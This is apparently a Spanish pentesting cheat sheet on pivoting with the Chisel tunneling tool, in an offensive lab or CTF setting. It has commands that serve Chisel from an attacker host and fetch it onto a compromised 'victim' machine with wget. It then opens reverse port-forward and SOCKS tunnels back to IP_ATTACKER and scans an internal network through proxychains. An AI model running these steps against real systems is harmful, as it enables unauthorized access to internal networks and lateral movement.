Chisel
Descarga
Lo descargamos en nuestra maquina kali (atacante)
Recomendable v1.7.2
Opcion 1
Clonamos chisel en nuestro equipo
git clone https://github.com/jpillora/chisel
cd !$
go build -ldflags "-s -w" .Opcion 2
Vamos a los releases y descargamos la versión que queramos (linux_amd64.gz)

Ahora solo descomprimimos
gunzip chisel_1.10.1_linux_amd64.gz && mv chisel_1.10.1_linux_amd64 chiselReducimos su peso
Podemos comprobar su peso con
du -hc chiselantes de reducirlo
Y ahora reducimos su peso
chmod +x chisel && upx chiselCompartir chisel - wget
Ahora me levanto como servidor web con python y me comparto (a una de las maquinas victimas (que tenga ejecucion de comandos)) con wget desde el /tmp de la maquina victima o el /dev/shm
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ..wget http://10.10.14.16/chisel
Compartir chisel - curl
Uso
Puerto a puerto
Me levanto un servidor con chisel (desde mi maquina kali atacante)
./chisel server --reverse -p 1234En la maquina victima, doy permisos de ejecución chmod +x chisel a chisel y me pongo como cliente y hago el portforwarding
./chisel client IP_ATTACKER:1234 R:8080:10.10.10.128:80El
R:8080:10.10.10.128:80dice R: el 80 (puerto de mi maquina de atacante (puede ser el que sea)), quiero que me vuelques lo tiene la ip 10.10.10.128 en su puerto 80. Así que si nos vamos a nuestro http://localhost;8080 deberíamos ver el contenido de 10.10.10.128 haciendo un tuneling a través de la 192.168.18.213 (MAGIA)A veces es necesario utilizar "releases" del git de chisel mas antiguos (según la maquina)
Con Sock
Me levanto un servidor con chisel (desde mi maquina kali atacante)
./chisel server --reverse -p 1234En la maquina victima, doy permisos de ejecución chmod +x chisel a chisel y me pongo como cliente y le meto el sock
./chisel client 192.168.18.215:1234 R:socksA la hora de lanzar comandos, hay que poner primero
proxychainsEJ:
proxychains nmap --top-ports 1000 -sT --open -T5 -v -n -Pn 10.10.10.128 2>&1 | grep -vE "timeout|OK"
Last updated